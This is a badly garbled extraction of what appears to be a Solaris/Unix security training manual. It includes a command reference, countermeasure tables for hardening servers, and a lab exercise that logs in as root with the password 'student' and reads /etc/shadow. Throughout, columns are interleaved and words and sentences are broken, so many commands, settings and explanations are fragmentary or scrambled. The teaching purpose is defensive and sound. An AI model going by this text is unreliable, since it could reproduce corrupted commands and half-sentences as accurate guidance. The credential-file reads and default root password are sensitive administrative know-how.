appends a copy of "nextfile" to file "listout" instead of overwriting what 

 a "pipe" so that output from one program (on left) becomes input 
to the next one (on right). Thus: 

 (printing) program.  

, 

 
? 

 

 
as special. For 

tation display 
he man or the 
, type

 page

nd Directories 
 UNIX filename or direct ain up to 255 letters, digits, and 
punctuation characters (best limited to period and underscore). To list names of 
files in your own directo
 
ls 
 
This will not list filenames that begin with a period, unless you include the -a 
(all) option, like this: 

s -a 

-l  
long form, gives file protections, size in bytes.  
 
-F 

>

 
cat nextfile >> listo
  

is already in "listout". 
 
| 

Creates

 
ls | lpr  

 
sends output from the ls (listing) program to the lpr

 
* 

Matches zero or more characters in a filename. For example, A* matches A
AbC, ARGUE, African, etc.  

Matches any single character in a filename. For example, A?C matches AAC,
ABC, ACC, etc.  

 
\

Prevents the following character from being interpreted 
example, \* makes * an ordinary character.  

 
Getting Online Help 
Online UNIX documen
or print by using t
rm (remove) program
 
man rm  
 
apropos keyword 
 
to get a list of man
 
 
iles a

 consists of "man" (manual), pages that you can 
 program. For example, to display the man page f
:  

s that contain keyword in their title lines. 

ory name can cont
F
A

ry, type:  

 
l
 
Other ls options include:  
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marks 
 
-b Forces the printing of nonprintable characters to an octal format. 

y. For example: 

he -i (interactive) option to rm causes the system to request confirmation of 
ach f ul 

m -i 

mmary of Useful Commands 

therw l 
nly" 

Access
 
admint
exit -
getfac
id - identify the UID, GID, EUID, EGID  
logout - sign off; end session (C shell and bash shell only; no man page) 
passwd - change login password  
rlogin - log in remotely to another UNIX system  
setfacl - set file access control list 
slogin - secure version of rlogin 
su - switch user/super user 
usermod - modify user account information 
 
Communications 
 
Mail - send and receive mail 
wall - send message to all users 
talk - talk to another logged-in user (full screen) 
write - write to another logged-in user 
 
Programming Tools 
 
awk - pattern scanning and processing language  
cc - C compiler (xlc on ADS)  
crontab - maintain periodic tasks  
csh - C shell command interpreter  
kill - kill a process  
make - manage multipart program projects  
nice - run a command at low priority (see "man nice" or "man csh") 
nohup - run a command immune to hangups  
sh - Bourne shell command interpreter  
 

directory names with a slash, executable files with an asterisk.  

 
Deleting a File 
Use rm (remove) to delete files from your director
 
rm trashfile  
 
T
e ile deletion. This option may prevent accidental deletions and is usef
if you are removing several files, as in: 
 
r *file 
 
Su
The following commands are grouped alphabetically by function. Unless noted 
o l. Commands marked "C shelise, each has a man page describing it in ful

are described in the csh man. o
 

 Control 

ool - create, assign, modify groups, users, printers, etc. 
 terminate a shell (see "man sh" or "man csh") 
l - read file access control lists 
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Documentation 
 
apropos - locate commands by keyword lookup  
man - 
whatis
whereis - locate source, binary, or man page for a program  
 
Editor
 
emacs 
ex - l
sed - 
vi - full-screen text editor 
dtpad 
textedit -text editor within open windows  
 
 
File and Directory Management 
 
cd - c
chgrp 
chmod - change the protection of a file or directory  
chown 
cmp - 
compre
cp - c
crypt - encrypt/decrypt files (not on ADS) 
cut - 
diff -
find -
rep -

a link to a file 
the contents of a directory  

mkdir - create a directory 
ame files
ull pathn

) file
ove) d   

 merge file  
  
ult fi
e comp

 words, 

nting 

nts of a

 from t
file, on
 but p ints screens top to bottom  
st part of a 

 compressed fil

find manual information about commands 
 - describe what a command is  

s 

- screen-oriented text editor 
ine-oriented text editor  
stream-oriented text editor  

- text editor within CDE 

hange working directory  
 change group owner -

- change owner 
compare two files  
ss - compress a file  
py files  o

display specific file information   
 compare the contents of two ASCII files (sdiff for side by side) 
 look for files by name  
 search a file for a pattern  g

ln - make 
ls - list 

mv - move or re
pwd - show the f
rm - delete (remove
rmdir - delete (rem
sort - sort or
touch - create file
umask - change defa
uncompress - restor
wc - count lines,
 
File Display and Pri
 
cat - show the conte
lpr - print a file  
lprm - remove jobs
more - display a 
page - like "more",
tail - show the la
zcat - display a
 

n  and directories 
ame of your working directory  
s  
rectoriesi
s

le pro ections  
ressed file  
and characters in a file  

t

 file; catenate files 

he printer spooling queue 
e screen at a time 
r

file  
e  
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ile Transfer 

s between network hosts  
 between networked UNIX hosts  
 of rcp 

nym commands 
lt login shell  

lear - clear terminal screen  
cho - echo arguments  
etenv - set an environment variable (C shell only)  

etworks 

etsta in/netstat)  
login
slogin
rsh - 
sh - secure-shell version of rsh 
elnet
 
roces

The f not 
ave separate man pages.) 

g - bring process into foreground  

z - suspend current process 

tatus

w date and time  

 read message log  
e used  
vironment or run programs under modified environment 

inger - look up user information 

 full pathname of working directory  
et - set shell variables (C shell, bash, and ksh only)  

 - sh  job is executing  
ho - show who is logged onto the system  

F
 
ftp - transfer file
rcp - transfer files
scp - secure version
 
Miscellaneous 
 
alias - define syno
chsh - change defau
c
e
s
stty - set terminal options  
 
N
 

t - show network status (on UTS, /usr/sbn
r  - login remotely on another UNIX system 

 - secure version of rlogin  
run shell or command on another UNIX system  

s
t  - run Telnet to log in to remote host  

s Control P
 
( ollowing commands function under the C shell, bash, and ksh. They do 
h
 
bg - put suspended process into background 
f
jobs - list processes 
^y - suspend process at next input request 
^
 

 Information S
 
acctcom - read processing accounting data 
date - sho
df - summarize free disk space 
dmesg -
du - summarize disk spac
nv - display current ene
f
history - list previously issued commands (C shell, bash, and ksh only)  
last - indicate last login of users 
lastcomm - read processing accounting data  
lpq - examine spool queue  
ps - show process status  
pwd - display
s
stty - set terminal options  
w ow who is on system, what command each
w
whois - Internet user name directory service  
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achine and Site Preparation 

ritten Security Policy 

M
 
W

V easure ulnerability Counterm
Only by doing proper 
analysi
plannin
to prov
environ

ata.  S
 secur

synony
ng jo
ad m

� 1. Asset identification and evaluation 

� 5. Qualitative and quantitative risk assessment 

ile defending against numbers 2,3, 4 and 5. 
 

s and security 
g, can you hope 
ide a secure 
ment for your 
ecurity without 

� 2. Threat identification and assessment 
� 3. Vulnerability and exposures identification and 

assessment 
� 4. Determine access and control requirements 

d
a ity policy is 

mous with a 
urney without  a 

� 6.  Develop your plan and policies to maintain number 1 
wh

lo
or ap  

 
 
Server Access 

Vulnerability Countermeasure 
Physic

nautho
ould r

periphe
service
overrid
removable m
miscell
tamper
Remem

 1. Place the server in a locked room accessible only by the 
System Administrator. 

al access by 
rized personnel 

�
u
c esult in theft of 

rals, denial of 
, security 
es via 

edia, or 

• Maintain a list of personnel authorized entry 
• Establish key/access control. 
� 2. PHYSICALLY lock the CPU case 
 

aneous 
ing. 
ber that there is 

thout NO security wi
Physical Security.  

ccess to the interior A
of the CPU case 
exposes the computer 
to theft, sabotage, and 
reconfiguration. 
 
Access Control 

Vulnerability Countermeasure 
Access control has 
several primary 
objectives.  They are:  
Identification, 
Authentication, 
Authorization, 
Confidentiality, 
Integrity, Availability, 
and Accountability 

� 1. Before a user gains access to an access control object, the 
user must go through three levels of access control. 

• The user must be identified 
• The user must be authenticated based on the identification 

supplied 
• Once identified and authenticated, the user must be 

authorized for access to the object under control. 
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Authentication Methods 

Vulnerability Countermeasure 
Authentication is the � 1. There are 3 types of authentication 
transfer of some 

form

authorization and 

• Something you know (password) 
in ation that proves 
you are who you say 
you are.  Failure to 
properly identify users 
results in a breakdown 

• Something you have (token, smart cards, Id badges) 
• Something you are (biometrics) 
 

of 
access control 
 
 Contingency Planning 

Vulnerability Countermeasure 
If Information 
Technology operations 
are disrupted, mission 
critical functions could 
be lost. 

� 1.  Minimize the impact of fire, flood, civil disorder,  
natural disaster, or bomb threat. 
�2.  Identify an alternate site containing compatible 

equipment.  
�3.  Identify backup procedures if the primary IT operation 

site is disrupted. 
�4.  Destruction or safe guarding plan in case of site 

d sites) 
�

evacuation. (classifie
5.  Plan the test - test the plan. 

Instal
 
Secu

lation and Configuration 

ring a Unix server starts with the installation. 
Vulnerability Countermeasure 

Security  be 

 use. 

�1. Some things that should be part of a secure installation 
cess 

• Install the OS w/Patches 

• Secure the startup scripts 
• Enable logging 

.   
 

 should
involved in every phase pro
of installation and 
system

• Do not be connected to the network. 

• Secure the inetd 

• Protect against  
              –buffer overflows, root network access, system 
account access, 
                sendmail, motd misuse, permissions, trusts 

• Install ssh (secure remote communication method) 
 
NOTE:  A minimum install will increase security by not 
loading various applications
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Into to UNIX System Secu

Practical Exercise SAS-6A
EXERCISE A 

 
This Practical exercise is designed to get you fa  in 
general.  In the following steps, yo  and key 
security entries.  The command y that are 
bold and underlined.  Type the com to hit 
the space bar. 
 
1.  It is time to login into your com eting 
you.  This is where you will type y
 
2.  Upon submitting you Log On I  Password 
is:  student 
 

.  The system should boot up in the common desk top environment (CDE).  It has a background 
at is purple in color and has the word Solaris tiled all over it.  There may be boxes popping up in 

o ahead and close them by right clicking in the title bar and selecting close. 

ed all the bo nu will 
 new popu ill 

e will be d k. 

t down e .  To 
e root on e

rity 

 

 
 

miliar with Unix, Unix files and the system
u will learn about, view and examine files for structure

e s ou type will be printed in bold text.  Do not type thos
mands as you see them.  The "‸"  symbol shows you when 

puter.  You should see a box with a warning banner gre
our  Log On ID.  Your Log On ID is:  root 

D, you will need to supply a password.  Your Log On

3
th
the desktop window.  G
 
4.  After you have clos
appear.  Select Tools.  A
popup.  This is where w
 
5.  You may have to shu
shut down you must b
–DO NOT

xes, right click anywhere in the background, a popup me
p menu will appear, select Terminal.  A shell window w

oing the majority of our wor

 th  system either at the end of the day or for some other reason
 th  system. 

 Press the rese
–DO NOT

t button 
 Press the pow

–DO NOT
er button 

 pull the power cord
Improper shutdown will resu in  

 
lt  the loss of data or the requirement to run a file system

check (fsck -y) 
 
–shut down by entering the pro r
 init 0, shutdown, (sync, sync
- reboot the system by entering
 init 6(soft boot), reboot 

pe  command at a shell prompt 
, halt), halt 
 the command at the shell prompt 
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6.  So what constitutes a Unix 
 
A set of enabling technologie first developed at AT&T that have been incorporated into 
several legally distinct but clo nsidered 
to be a Unix system.  If it looks lik utilities and 
programs, and is developed w h
 
 
7.  On any Unix system, there are 
 

Root 

system.  This simple definition will suffice: 

s 
sely related operating systems, each of which can be co

e Unix, operates like Unix, runs common Unix 
it  Unix as a model, its Unix. 

3 types of Users: 

 
•Has complete control over the complete system. 
•Can access all files 
•The only one that can exe
•Has the UID of 0

cute certain commands 
 

 
Normal users 
•Any user that can login 
•Have a home directory that they can create and manipulate files in. 
•Ca
•Usually a human being 
 
Sys

n not perform many system level functions 

tem users 
stem users don't login 
counts that are used for specific system purposes. 

•Sy
•Ac
•The nobody account is an example (nobody handles http requests). 
•System
 

 
/s) is t d 

Linux d

0  -  Used to term
     
1  -
2  -
3  -
4  -
5  -  Safe for autom
6  -
     
S or s  -  Single user m
 
•Th

 accounts are created during install and without passwords 

 
8.  Unix has various run levels that you can choose between.  Each run level (0 through 6 to include
S ied to a directory filled with scripts.  The run levels 2 through 5 may vary between Unix an

istributions. 
 

inate the operating system. 
   Safe to power down the system. 
  Single user, admin/maintenance level. 
  Multi-user, no NFS services 
  Multi-user including NFS (default) 
  Not used by most flavors. 

atic power down if supported. 
  Used to shut the system down and reboot to 
  the default level (soft boot). 

ode with all file systems mounted. 

e command “who -r” will show you the run level 
 invoke the run level, type “init #”•To  
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9.  Che
 

hen y he scripts in that run level.  Let's go look 
t an ex

 
 

start with a capitol "S".  Those scripts starting with a "K" run first and will kill processes.  
are starting up a service or proc n as your "start up" 

ame the script.  Example:  S72inetsvc could be 
vely t

and to go back to your hom

 (K) scripts 

 

ck your default run level. 

a.  run the "who -r" command to find your default run level.  # who‸-r 
ou boot into a run level, you are actually running tW

a ample: 

b.  Change to the directory for run level two.  # cd ‸/etc/rc2.d 
 
 c.   Run the "ls" command to see the directory contents.  # ls‸-al 
  

d.   Notice the contents of the directory.  Some scripts start with a capitol "K" and others 

Those with an "S" ess.  These are know
scripts.  To stop a script from running, ren
renamed to _S72inetsvc.  This would effecti urn off this script. 

 
 e.   Run the "cd" comm e directory.  # cd  
 
Startup (S) and Shutdown

Vulnerability Countermeasure 
Attackers, if they gain 

 your system, 
n likely 
modify 
s. 

nderstanding what 
ripts should be in the 

* directories is 
rucial. 

�1.  ALL startup/shutdow ble and 
executable only by root (5
�2.  ENSURE that the lin sts 
in a startup script to clean used to create 
/etc/motd. This should occur BEFORE the code to startup 
the local daemons.  
�3.  EXAMINE all "S" fi or 
similar directories).  Any f

g 
esses. 

ame 

access to
will more tha
add scripts or 
existing script
U
sc
/etc/rc
c
 

should be renamed (be sure the new names DO NOT start 

n scripts should be reada
00). 
e "rm -f /tmp/t1" (or similar) exi
up the temporary file 

les in /etc/rc2.d and /etc/rc3.d (
iles that start unneeded facilities 

with a capital "S"). 
�4.  TEST all boot files changes by rebooting, examinin
/var/adm/messages, and checking for extraneous proc
 

#mv /etc/rc2.d/Sfilename /etc/rc2.d/.NOSfilen
#cat /var/adm/messages 

             #ps –elf 
 
 

.  Let's find out where our default run level is set up. 10
  

a.   View the /etc/inittab file.  # cat‸/etc/inittab 
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d 

 
1.  Let's look at the file that contains our user information.   

 the /etc/passwd file.  # cat‸/etc/passwd 

shell" 
 
 
  
 

 

b.   Find the line that reads "is:3:initdefault".  The 3 refers to the default run level.  It shoul
match what you saw when you ran the "who -r" command.  Changing this setting would 
change the default run level. 

1
 
 a.  View
 
 b.   The structure is "login-id; password; user-id#; group-id; user info; home directory; 

c.   The "x" in the password column reflects that each password is stored in the shadow file.  

d.   The "0" user-id reflects the root user.  Any account with the user-id of zero will be  
treated as root.  There should only be one root account. 

 
e.   The last thing on the line is the shell.  If one is not listed, a default shell will be assigned. 
The bourne shell (/bin/sh) is assigned in Solaris in such instances.  Accounts may be 
disabled by assigning a false shell to them.  Every account must have an authorized valid 
shell assigned to them in order to operate on the system. 
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Examples of some shells:   
 
VALID SHELLS               (file name) (prompt) 
Bourne Shell (1)                    /bin/sh        $ 
Korn Shell   (4)                    /bin/ksh       $ 

C Shell   (2)                           /bin/csh        % 

                                             any shell        #  (you are ROOT) 

FALSE SHELLS

Bourne Again Shell   (5)      /bin/bash     $ 

Tenet C Shell   (3)               /bin/tcsh        > 

 
 (disable login)     

l         
 

TE

/bin/fa se /dev/null 

RESTRIC D SHELLS   
restricted Bourne shell   /usr/bin/rsh 

t  Korn shell      /usr/lib/rksh 
 

t ns. an ions.  These 
type of shells are not assigned to a user but act as utilities to gain network access.  Examples 

 
n b t au in.  Root can create a /etc/shells

restric ed

f.  There are also shells designed for remote connec io d secure connect

are remote shell or secure shell. 

g.  Shells ca e valid and still no thorized for log  file 
 /etc/shells file exists, all shells not 

listed in it, will function similar to a false shell in regards to login. 

Shells  

and can list in it, the shells authorized for login.  If a

 
  

Vulnerability Countermeasure 
Shells are almost 
always in a binary 
directory.  Ensure that 
you list only the  

absolute pathnames to 
the shells.  Shells may 

 
�2.  ENSURE that each username entry in

be in /bin, /usr/bin, 
/sbin, etc.  Because the 

an authorized shell listed in the /etc/shells
NOTE: /dev/null, /bin/false, or /bin/t

entire /etc/shells file is 
read by Unix, DO are used to disable

NOT use pathnames to 
non-shell scripts, nor 
should you use any 
extraneous characters 
as these will be 

�1.  ENSURE that ALL authorized shells are listed in the /etc/shells 
ash, /sbin/sh, /bin/tcsh, 

/bin/zsh, etc. 

#cat /etc/shells 

 the /etc/passwd file invokes 
 file. 
rue will be used to replace 

shells, but WILL NOT be listed in the /etc/shells file because they 

interpreted as 'non-
shells' by Unix and 
your users will not be 
able to log in. 

file, i.e. /bin/sh, /bin/ksh, /bin/csh, /bin/b

 account login.  If yo
file, ftp access is enabled for the accounts 

u place them in the /etc/shells 
with a false shell. 

tc/shells file WILL NOT 
 be owned by root, and WILL 

have access permissions of 555. 

#chmod u-s shell (i.e. /bin/sh) 
#chmod g-s shell (i.e. /bin/csh) 

#chown root shell (i.e. /bin/bash) 

�3.  EACH authorized shell listed in the /e
have the SUID and/or SGID bits set, WILL

 

#chmod 555 shell (i.e. /bin/ksh) 

 

Kelly Larsen
(a) 444; (b) 444; (c) 755; (d) 777; (e) 555; (f) 400; (g) 4551; (h) 705; (i) 777; (j) 777; (k) 6001; (l) 3400; (m) 666; (n) 6555

Kelly Larsen
(a) 664; (b) 620; (c) 731; (d) 766; (e) 666; (f) 644;  (g) 700; (h) 622; (i) 722; (j) 664

Kelly Larsen
(a) r-xr-xr-t; (b) rwsrwsr-x; (c) rwxr-Sr--; (d) r-s-----x; (e) r--r--r--; (f) rw---x--x; (g) ---r--r--; (h) --x--x—t; (i) –S—S—T; (j) –x—s--t
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ccounts listed in the 

o not have an assigned 

efault from the 

ourne shell (/bin/sh). 

 
A
/etc/passwd file which 
d
shell, receive one by 
d
system, normally the 
b
 
 
 
12.  Let's look at the file that contains our password information. 
 
 a.  View the /etc/shadow file.  # cat‸/etc/shadow 
 

b.  The format is "login-id; password; lastchange; minimum time before changing; 
maximum time its good; warning; inactive date; expire date; optional flags" 

 
c.  Your login-id's should match your /etc/passwd file entries.  These two files contain a list 
of all your accounts by login-id. 

 
 d.  The system accounts have passwords of "NP" (no password) or "*LK*" (locked). 
 
 e.  Let's lock an account.  # passwd‸-l‸nobody 
 
 f.  View the /etc/shadow again.  # cat‸/etc/shadow 
 
 g.  See where the "nobody" account now says that it is locked. 
 
 h.  To unlock an account, run the command in the same format without the "-l" switch.  Do 
not unlock 
                 the nobody account.  When you unlock an account, you will have to provide a password 
for the 
                 account unlocked. 
 
13.  Lets look at the file that lists your groups and group membership.  Only members of multiple 
groups are listed in this file.  If you belong to only one group, the /etc/passwd file will show that 
group.  Never add members to the wheel group natively (don't make that their primary group in 
/etc/passwd).  Staff members should be in staff group.  Only add to the wheel group in the 
/etc/group file. 
 
 a.  View the /etc/group file.  # cat‸/etc/group 
 
 b.  The format is "group name; password; group id; user list separated by commas" 
 
 c.  The /etc/passwd, /etc/shadow, and /etc/group files represent your authentication files.   
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4.  Now let us view the file that establishes some of our more important security settings. 

 /etc/default/login.  # cat‸/etc/def

e that say LE=/dev/console.  This entry controls root logon.  This 
 root l ing the 

minal".  Always assum e root password is compromised.  That is why we restrict access 
to only local.  In Linux, ma re.  This stops the 
rlogin/telnet connections.

 
c.  Find the line that say  
authenticated via passwords

nd the line that says SYSLOG=yes.  This entry ensures that root logons are recorded. 
 

y #UM
d.  The p  front indicates that it is commented out and that the 

ore any code on this line.  Normally this indicates that the system umask 
c/profile

try that says 
 by the before your 

 locked.  This nt (#) mark 
removed.  This would then
 
g.  Find the entry for SYSLOG_FAILED_LOGINS.    This variable determines how many 
failed login attempts ar s logged.  The default is 5.  
A setting of "0" would log all failed attempts. 

  
15.  Let's view the /etc/profile file. 
 

a.  If you check towards the bottom of the file, you should see that there is an entry for 
mask.   Solaris 8 has it set to 022.  This value will be shared by all who log on the system unless 

mask in their ~/.profile, ~/.login, or ~/.cshrc file. 

 
1
 

a.  View the ault/login 
 

b.  Find the lin
setting will allow
ter

s CONSO
ogin at the server but not over the network.  It is called "secur

e that th
ke sure all the ptys in the /etc/ttys file are set to unsecu

 

s PASSREQ=yes.  This entry ensures that your users will be
.   

  
 d.  Fi

e.  Find the entr
may be assigne
computer will ign
is set in the /et

 
f.  Find the en
does not get read
account gets

ASK 022.  This entry is one of the places that your system umask 
ound sign in the

. 

#RETRIES=5.  This entry is commented out so that you know it 
 computer.  Army policy is you get 3 bad tries to logon 

would need to be changed to 3 and the comme
 reset the telnet session after every 3rd bad login. 

e recorded before a failed login message i

 # cat‸/etc/profile 

 
u
they set their own unique u
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6.  Let's look at the file that allows us to set up a password policy within Unix. 
 
 a.  View the /etc/defaul
 
 b.  Notice that it only h ned.  The 
PASSLENGTH refers to the chara .  
You would have to adjust this  password 
is good before it expires;  150 establishes the earliest 
time when you would be able to change your password, 90 days/13 weeks for systems. 
   
 c.  This file does not co s security measures found in 
Windows systems.  You must t ds. 
 
17.  At the heart of the operatin ow 
the system manages system memor rnel 
stays resident in memory at all time y 
targeted in denial of service attacks ow the kernel operates 
an only be accomplished by recompiling the kernel with new instructions or by placing entries in 
e /etc/system file.  The /etc/system file is the one file that directly communicates to the kernel and 

hat were precompiled.  It operates similar to the Windows registry. 

tc/system

tice that there ar  the file.  A default 
ation will normally not contain entries.  Examples of items you could alter:  maximum 

rocesses; m x  
 limits; maximum nu  

.  Example entries are:   
 1.  set nfssrv:nfs_portmon 1         (this would allow only nfs requests via ports 1 - 

024) 
this would allow all users to change ownership on files) 

r compute
u are taken in  the 
omputer stor
derstanding o undamental 

ryption: symmetr k m 
key-based algorit  key encryption; and hash ciphers, such as 
e are the p imary methods of cryptography systems, and most encryption 

hemes are based around one or a combination of these.  

Unix passwords are stored using hash ciphers, one-way hash systems. The encryption is fairly 
simple, a fact that has its merits and its disadvantages. On the one hand, the relative simplicity 

 
1

t/passwd file.  # cat‸/etc/default/passwd 

as three options, two of which are not even assig
cter length of the password.  The Army standard calls for 10

with a text editor.  The MAXWEEKS refers how long the
days/21 weeks for systems.  The MINWEEKS 

ntrol password content nor addres
urn to 3rd party tools for those nee

g system lies the kernel.  It is the compiled code that controls h
y, the file system, disk operations, and processes.  The ke
s.  Many of the things that the kernel controls, are directl
.  As the kernel is compiled, changing h

c
th
allows you to alter settings t
 
 a.  View the /e
 

b.  You will no
install
number of user p
descriptor
others. 

 

 file.  # cat‸/etc/system 

e some commented out instructions in

a imum number of users; number of groups per user; file
mber of queued commands, buffer overflows, and many

 c
 
1
  2.  Set rstchown=0  (
 
 
18.  You sit down at you
password. Magically, yo
scenes? How does your c
To begin with, a basic un
techniques of enc
ciphers; asymmetric 
SHA and MD5. Thes

r. You enter in your user name, and then you enter your 
to your account. What is actually happening behind
e passwords, and how does it keep them secure?  
f cryptography is necessary. There are three f

ic ey- based algorithms, such as block ciphers and strea
hms, such as public

r
sc
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yption is performed quickly, so logging in happens immediately. On the other, the 
sswords are easy to crack.   One advantage is that your password is not stored 
ywhere. A s stored in the password file 

ault). That d; when 
assword, the y a, the hash 
nows how i rd, so 
the system e r  function, 
pted results  

means the encr
simplicity means pa
on your computer an
(/etc/passwd, by def
you originally set the p
function. The system k
every time you log on, 
and compares the encry

 hash, an encrypted string of ch
has

aracters i
h was formed the first time you typed in your passwor
 s stem encrypted it using a set mathematical formul

t hashed the sequence of characters that is your passwo
nc ypts what you have just typed using the same hash
 to the encrypted password. 

 
k...that's a pretty big downside. Surely therBut the password fi

protect our passwords. W
file, /etc/passwd, is w
stored in /etc/passwd
view your password f
enhance security, the sha
computer stores non-se

le is easy to crac e's got to be a way to 
ell, in e  isn't. The password 

orld read e  that's 
. Since it's world readable, anyone who's got read access to your computer can 
ile and run cr  To 

dow pass  was developed. When using shadow passwords, the 
nsitive informa able, and stores the 

ashed passwords in /etc/shadow, whi yone can read 
the file; only those with root access can read the shadow file, and if you've already got root, then 
there's often little need for the the 
/etc/master.passwd file and see shorter, 
DES.  MD5 passwords start wi .  DES is encrypted in a 64 character alphabet which does not 
include the $ character. 
          
NIS, NIS+ and /etc/passw

 th  classic configuration of Unix systems, there
abl . It has to be, because of the other crucial information

acking programs against it. Obviously, this is a problem.
word system

tion in /etc/passwd, which is world read
h ch is -not- world readable. This way, not ever

password file.   FreeBSD uses encrypted passwords.  Check 
 that the longer passwords are encrypted with MD5 and the 
th $1$

d entries  (Distributed Authentication) 
Vulnerability Countermeasure 

Improper setup of NIS 
and/or NIS+ have been 
the cause of several 

 if you don’t really need it. 
ired, DO use NIS+ if possible. 

Ensure that NIS+ cannot talk to NIS by setting NIS+ to 2. 

�1.  T run NIS or NIS+
•  If NIS functionality is requ

DO NO
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exploits against Unix 
systems.  Users could 
have access to the 
/etc/passwd and the 
/etc/shadow files.  If 
you do not need to 
have a distributed 
database of all objects 
in your network, then 
do not use NIS/NIS+. 
 

If response is passwd: files, you do not use NIS or NIS+. 

 clients; i.e., NOT the 

documentation and implementations regarding the ‘+’ 
ent and so a generic solution is not available 
here. It would be best to consult your vendor’s 
documentation. Some of the available documentation 

h is 
IS. We 

rd 
field. 

Ensure d field is correctly implemented  
1. Try u e password field for 
exampl nnot log in to that machine, 

. With the ‘*’ removed, try logging in again. If NIS users 

 
 vendor for more information. If NIS users 

mentation should not be vulnerable to this problem. 
at /etc/rc.local or the equivalent startup 

procedure is set up to start ypbind with the -s option. This 

• l is only used by NIS/NIS+ 
CONSIDER using Secure RPC (used by default with 
NIS
NOTE: Secure RPCs are discussed on pages 570-578 

n es or 
o  
h
n
each netgroup. The added time required to administer 
these extra netgroups is a small cost in ensuring that 
strange permission combinations have not left your 
machine in an insecure state. 

Refer to the manual pages for more information 

#grep passwd /etc/nsswitch.conf  

• ENSURE that the only machines that have a ‘+’ entry in 
the /etc/passwd files are NIS (YP)
NIS master server! There appears to be conflicting 

ry format 

suggests placing a ‘*’ in the password field, whic
NOT consistent across all implementations of N
recommend testing your systems on a case-by-case basis 
to see if they correctly implement the ‘*’ in the passwo

 that * in the passwor
sing NIS with the ‘*’ in th

e: +:*:0:0::: If NIS users ca
remove the ‘*’ and try the next test.  
2

can log in AND you can also log in unauthenticated as 
the user ‘+’, then your implementation is vulnerable.
Contact the
can log in AND you cannot log in as the user ‘+’, your 
imple

• ENSURE th

may not be applicable on all systems. Check your 
documentation.  
/etc/rc.loca

• 
+) 

• If you are using NIS (YP) or NIS+, DEFINE each 
etgroup (Pgs 581-586, 750) to contain only usernam
nly hostnames. All utilities parse /etc/netgroup for either
osts or usernames, but never both. Using separate 
etgroups makes it easier to remember the function of 

 

s 
 
Guest Account

Vulnerability Countermeasure 
Guest accounts allow �1.  IAW HQ DA SAIS-IAS message DTG R 050951Z 
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er to 
ystem.  

This user will not have 
been verified against 
login criteria.  The 
identity of this user will 
be unknown. 

 
ist in /etc/passwd or 

/etc/shadow.  
onfigured with guest 

ou cannot remove the account, disable login to the 

such as the wheel group under 
ch users can use su to become root.  

h 

On

in to accounts that have no password which 
execute a command, for example sync. 

SET the account’s shell to 
 

tem 

 these accounts do not have any cron or at 

• A
/
daemon, lib, uucp, news, sys, sync, etc. if they are not 

etc/passwd  
Most system accounts have no shell associated with 

#usermod –s /bin/false bin 

an unauthorized us
access the s

MAR 99, all guest  
accounts shall be disabled. 

• VERIFY that NO guest accounts ex

NOTE: Most systems come prec
accounts 

• If y
account by assigning /bin/false or /dev/null as the shell. 

 
• USE special groups (

SunOS) to restrict whi
Some versions of Unix use the group /etc/su.people whic
contains a list of users that may su.  

 Solaris, you must know the su password or utilize the 
sudo utility. 

 
• DISABLE log

/bin/false or /dev/null 

DELETE or change ownership of any files owned by sys
accounts, i.e. bin, sys, sync, daemon, etc. 

 
ENSURE that

jobs.  It is best to remove these accounts entirely. 
LWAYS assign non-functional shells (such as 

bin/false or /dev/null) to system accounts such as bin, 

needed.  This will disable login to them. 
#more /

them. 
For example: 

 
19. Let's examine permissions th the 
"ls" command and various flag -R) 
recursive; (-u) access time 
 
 a.  View the contents o e
 

b.  The format is:  file type mission (r,w,x/s/S), Group's 
permission (r,w,x/s/S/l), other' ks to 
the file, owner, group o  file 
linked to with file type l"   permission"  
"other permission" "ACL" 

and other key file information.  The best way to do that is wi
s.  (-a) all files; (-l) long listing; (-b) nonprinting characters; (

f th  "/" directory.  # ls‸-alb 

 (-,d,c,b,l,s,p), owner's per
s permission (r,w,x/t/T), access control list if any (+), lin

wner, file size in bytes, date saved or modified, file name, and
Example:  "file type"  "owner permission"  "group "
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c.  The file types are:  (-) re es; (b) block 
devices; (l) links; (s) sockets; (p) buffers. 

 d.  The permissions are:  (r ) re ecute; (s) set UID/set GID; (t) sticky bit 
 

e.  Read permission on a file gives you permission to copy or view.  Read permission on a 
directory allows you to f 4. 

 
f.  Write permission on
directory allows you to dele Write permission for the other's category is the 

gular files/type f; (d) directories; ( c) character devic

ad; (w) write; (x) ex

 view directory contents. r--r--r-- .   Read has a binary value o

 a file lets you edit the file contents and write permission on a 
te files.  

most dangerous permission to allow.  Write permission for others is most often targeted 
by umask settings.  
-w--w--w-  .  Write has 

 
ission allows you to execute a program or access files within a directory.  
ute has a binary value of 1 

ission y 
n effec  of no 

ing "x").  The S

ission o the 
s it by a

"S" (or an " tory 
ing, an l (lower  is 

oved.  This will loc
categories.  The SGID 

 
j.  Sticky bit permission  the 
file owner UID, directo no 
underlying "x").  The s

 
20. Permissions are changed vi ode 
and chmod stands for "change er 
numbers or alpha/character ent each: 
 
alpha/character syntax: 
chmod [-Rfh] [agou] [+-=] [rw s
separate multiple permission se in
•chmod u+rw,go+r "file" 
a = all                         r = read 
g = group                   w = write
u = owner                   x = execute 
o = other 
- = remove 
+ = add 
= = replace 
s = suid/sgid 

a binary value of 2 

 g.  Execute perm
xec--x--x--x  .  E

 
h.  Set UID perm
assigning them a
underly

 
i.  Set GID perm
group that own
(uppercase 
file lock
rem

 allows the executer of a program to run it as if they owned it b
tive UID of the owner.  --s------  (uppercase "S" in case
UID bit has a binary value of 4. 

allows the executer of a program to run it as if they belonged t
ssigning them an effective GID of the owning group.  -----s--- 
l") in case of no underlying "x").  If the system supports manda
case L) may appear if the SGID is set and the group executable
k the file and prevent execution by both the group and others 
bit has a binary value of 2. 

, set on directories, allows deletion of files if your UID matches
ry owner UID, or root UID.  --------t  (uppercase "T" in case of 
ticky bit has a binary value of 1. 

a the command "chmod".  Permissions are known as the file's m
mode".  Only a file's owner may change file permissions.  Eith
ries are acceptable when assigning permissions.  Examples of 

xX tugol] file list 
tt gs by a comma: 

 
(example)  chmod 0644 or chmod 

  2000 = SGID 
 3000 = SGID/sticky bit 

numeric syntax:   

644  
 1000 = sticky bit 

 4000 = SUID 
 5000 = SUID/stickybit 
 6000 = SUID/SGID 
 7000 = SUID/SGID/sticky bit 
 0777 = rwxrwxrwx 
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t = sticky bit  0666 = rw-rw-rw- 
 4555 = r-sr-xr-x 
 1777 = rwxrwxrwt 

r-x  or  rwsr-lr-x 

 
 

 6745 = rwsr-S
 
      Consolidated O
      Individual O
      Symbol values
 
Some of the values shar
                                     

ctal values    
ctal values              4 2 1    4 2 1   4 2 1 

                     x 

e space
            

 
If all values are set, you would see                                                   r w s      r w s    r w t 

